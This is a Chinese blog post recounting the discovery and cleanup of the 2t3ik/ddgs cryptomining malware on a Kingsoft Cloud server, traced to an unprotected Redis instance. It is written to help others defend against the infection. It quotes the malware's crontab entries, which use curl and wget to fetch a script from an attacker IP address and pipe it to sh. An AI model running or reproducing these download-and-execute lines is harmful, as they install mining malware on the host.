我爱编程

金山云服务器处理2t3ik与ddgs病毒实录

2018-05-24  本文已影响0人  rightchen

今天操作公司的第二台服务器,服务器是金山云的云服务器。需要用到crontab定时任务,编写了一个命令,重启。之后再测试这条命令,然后很奇怪的是写进去的crontab一会儿不存在了,很是纳闷,难道我忘记保存了??继续操作,然后发新写入的现定时任务又没有了。这就让我产生了怀疑,难道是金山云定制的一些功能,还是权限的问题?

执行crontab -l,列出当前任务

[root@vm10-0-0-3 shell]# crontab -l

*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh

*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh

还没觉得奇怪,当我过了一会儿再刷新任务时,发现任务多了一个。

[root@vm10-0-0-3 shell]# crontab -l

*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh

*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh

*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh

一开始怀疑是云服务商的一些机制,带着疑问我就百度了这个地址是做什么的。

百度搜索截图

吓到我了,居然是病毒地址。点开详细查看了一下,确认是病毒。ip地址指向的美国,百度上介绍是挖矿病毒

搜狐新闻截图

另外打开了url查看了一下,都是linux操作命令。

url内容截图

由于工作时间较少,还是头一回遇到次问题。赶紧解决吧

1、我先是编辑crontab -e,将上述url去掉。:wq保存。重启crontab服务:service crond restart。果然crontab列表中没再次出现自动增长的链接。

此时查看进行,发现2t3ik.p程序占用cpu率已经高达398.5%

意味着此时问题还没解决。

2、按照网上搜索网友回答,我进入到/tmp文件夹下,

[root@vm10-0-0-3 tmp]# cd /tmp/

[root@vm10-0-0-3 tmp]# rm -rf 2t3ik.p

[root@vm10-0-0-3 tmp]# rm -rf ddgs.3011

此时,执行top命令,2t3ik.p程序cpu占用率依然没有减少。

根据上图所属,pid为31484。执行"kill 31484",杀死进程。执行top命令再看

PID为15505的进程cpu占用率依然占用着。再次执行"kill 15509"。

此时的运行状态趋于正常状态。查看了服务器近期的cpu占用率统计,原来这两天cpu占用率一直高居不下。

本来以为这就好了,谁知过了五分钟执行top命令,这个进程又死灰复燃了。!!!

cpu占用率依然高居不下

继续kill掉pid为16160的进程。

继续kill掉进行,有时还会以2t3ik.m出现。所以

接下来,进入/tmp文件夹,执行

cd /tmp/

rm -rf 2t3ik*                //删除2t3ik文件

rm -rf ddgs*

touch 2t3ik.p                //自己创建空文件

touch 2t3ik.m               

touch ddgs.3011    

chattr +i 2t3ik*           //保护文件不被修改 

chattr +i ddgs*

相当于自己创建两个文件,并且不给与修改的权限。这样存留在系统中自动创建进行会于此冲突。

重启服务器 shutdown -r now

问题就此解决。cpu占用率再没急速上升。

究其原因,有个说法是低版本的redis数据库没有设置连接密码,端口6379被扫描后入侵redis漏洞所致,获取了用户的权限。查看了服务器监控报表,确实发现是redis服务安装之后的一天cpu开始异常增长的。建议大家如果遇到此问题,检查redis,并对redis服务增设密码,或者指定ip访问。防止被扫描安装病毒程序。

下面是一些相关资讯:

http://www.sohu.com/a/232674211_468694

上一篇下一篇

猜你喜欢

热点阅读